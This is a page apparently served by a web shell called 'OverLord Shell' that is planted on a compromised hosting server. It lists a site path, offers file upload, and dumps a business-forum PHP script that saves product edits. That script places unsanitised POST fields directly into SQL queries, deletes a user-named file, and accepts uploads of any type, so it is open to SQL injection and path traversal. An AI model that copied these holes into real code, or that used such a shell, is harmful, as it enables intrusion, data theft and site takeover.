OverLord Shell

Path : G:/PleskVhosts/jaincensus.com/macciaweb.ultraliant.com/businessforum/
File Upload :
Current File : G:/PleskVhosts/jaincensus.com/macciaweb.ultraliant.com/businessforum/userproductedit_save.php

<?php session_start();
error_reporting(0);
session_start();
include("db/conn.php");
if(!isset($_SESSION['company_id']) || !isset($_SESSION['company_name'])){session_destroy();header("location:login.php");}
if(!in_array($_SESSION['loggedin_user'],array('admin','company'))){header("location:404.php");}


 $textBox = htmlentities(trim($_POST['textBox']),ENT_QUOTES);

  $description = htmlentities(trim($_POST['description']),ENT_QUOTES);

    $patterns = array();
    $patterns[0] = '/([a-zA-Z0-9_\-\.]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([a-zA-Z0-9\-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)/';
    $patterns[1] = '/([0-9]+[\- ]?[0-9]{9}+)/';
	$patterns[2] = '/([0-9]{2,}-[0-9]{0,}-[0-9]{0,})/';
	$patterns[3] =  "/(http|https|ftp|ftps)\:\/\/[a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,3}(\/\S*)?/";
	
    $replacements = array();
    $replacements[0] = '';
    $replacements[1] = '';
	$replacements[2] = '';
	$replacements[3] = '';


    //should use just one call of preg_replace for perfomance issues
$description = preg_replace($patterns, $replacements, $description);
$offer_des = preg_replace($patterns, $replacements, $textBox);
$pid=$_POST['product_id'];
$product_name=$_POST['product_name'];
$company_id=$_POST['company_id'];
$my_company_id=$_POST['my_company_id'];
$price=$_POST['price'];
$currency_id=$_POST['currency_id']; 
$discounted_price=$_POST['discounted_price'];
$catlog=$_FILES["catlog"]["name"];
$catid=$_POST['catid'];
$subcatid=$_POST['subcatid'];
$keyword=$_POST['keyword'];
if($offer_des!=''){
	$offer_flg=1;
	
}else{
	$offer_flg=0;
}


//$text = str_replace("'", '', $string);

if(!empty($_FILES["catlog"]["name"]))
{
	$cat=time()."_".basename($_FILES["catlog"]["name"]);
	  	$catlogpath= "uploads/products/".time()."_".basename($_FILES["catlog"]["name"]);
	
	
		if($_FILES["catlog"]['size'] < 2*1024*1024){
			@unlink("uploads/products/".$_POST["old_catlog"]);
			@move_uploaded_file($_FILES["catlog"]["tmp_name"], $catlogpath);
			
		  $updateq0="UPDATE busdir_product SET  `catlog`='$cat'WHERE product_id=".$pid;
			$updater0=$connection->query($updateq0);
			 $updateq1="UPDATE busdir_product_photo SET  `photo_path`='$cat' WHERE product_id='".$pid."' and mycatlog='y'";
			$updater1=$connection->query($updateq1);
		}
		else
		{
			echo "Image size error. Max size is 2 MB.";
			exit;
		}
		
}else{
		$cat = $_POST["old_catlog"];
		 $updateq0="UPDATE busdir_product SET  `catlog`='$cat' WHERE product_id=".$pid;
		$updater0=$connection->query($updateq0);
		}


		  $updateq=	"UPDATE `busdir_product` SET 	
						`product_name`='$product_name', 
						`price`='$price', 
						`currency`='$currency_id',
						`my_company_id`='$my_company_id',
						`discounted_price`='$discounted_price', 
						`description`='$description', 
 						`offer_flg`='$offer_flg',
						`offer_des`='$offer_des', 
						`keyword`='$keyword',
						`catid`='$catid',
						`subcatid`='$subcatid',
						`company_id`='".$_SESSION['company_id']."',
						`active`='y', 
						`modifiedby`='".$_SESSION['company_id']."' 
				WHERE 	`product_id`=$pid";
	//echo $updateq;exit;
	$updater=$connection->query($updateq);
	
	if($updater)echo "success";
	else echo "An unknown error occured. Please try again.";



?>

xRyukZ - Copyright 2k19